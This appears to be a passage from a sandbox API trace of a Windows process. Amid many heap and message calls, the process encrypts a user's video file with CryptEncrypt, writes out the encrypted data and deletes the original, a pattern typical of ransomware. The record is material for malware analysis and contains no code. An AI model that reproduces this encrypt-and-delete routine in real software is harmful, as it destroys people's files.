[0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0104.271] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.271] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.271] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0104.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.273] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.274] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.274] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.274] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0104.274] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.274] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.277] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xcb31, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xcb40) returned 1 [0104.277] CharLowerBuffW (in: lpsz="byte[52033]", cchLength=0xb | out: lpsz="byte[52033]") returned 0xb [0104.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.279] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453c1d0*, pdwDataLen=0x144e088*=0xcb31, dwBufLen=0xcb40 | out: pbData=0x453c1d0*, pdwDataLen=0x144e088*=0xcb40) returned 1 [0104.279] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.280] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xcb40, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0xcb40, lpOverlapped=0x0) returned 1 [0104.282] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0104.282] CryptDestroyKey (hKey=0x41ac780) returned 1 [0104.282] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.282] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.283] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0104.283] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0104.283] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.283] FreeLibrary (hLibModule=0x756e0000) returned 1 [0104.283] CloseHandle (hObject=0x298) returned 1 [0104.283] CloseHandle (hObject=0x258) returned 1 [0104.285] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi", lpFilePart=0x0) returned 0x53 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9d90 [0104.285] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yzzjzddz73jlas1uefcr.avi")) returned 0x20 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0104.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0104.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da298 [0104.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0104.286] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb73f020, ftCreationTime.dwHighDateTime=0x1d5ef00, ftLastAccessTime.dwLowDateTime=0xaa0bc220, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0xaa0bc220, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0xcb31, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="yzzjzdDz73JlAs1uEFCr.avi", cAlternateFileName="YZZJZD~1.AVI")) returned 0x41ac500 [0104.286] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yzzjzddz73jlas1uefcr.avi")) returned 1 [0104.332] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb73f020, ftCreationTime.dwHighDateTime=0x1d5ef00, ftLastAccessTime.dwLowDateTime=0xaa0bc220, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0xaa0bc220, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0xcb31, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="yzzjzdDz73JlAs1uEFCr.avi", cAlternateFileName="YZZJZD~1.AVI")) returned 0 [0104.332] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9d90 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0104.332] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0104.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0104.332] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0104.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0104.372] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0104.372] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0104.372] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0104.372] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 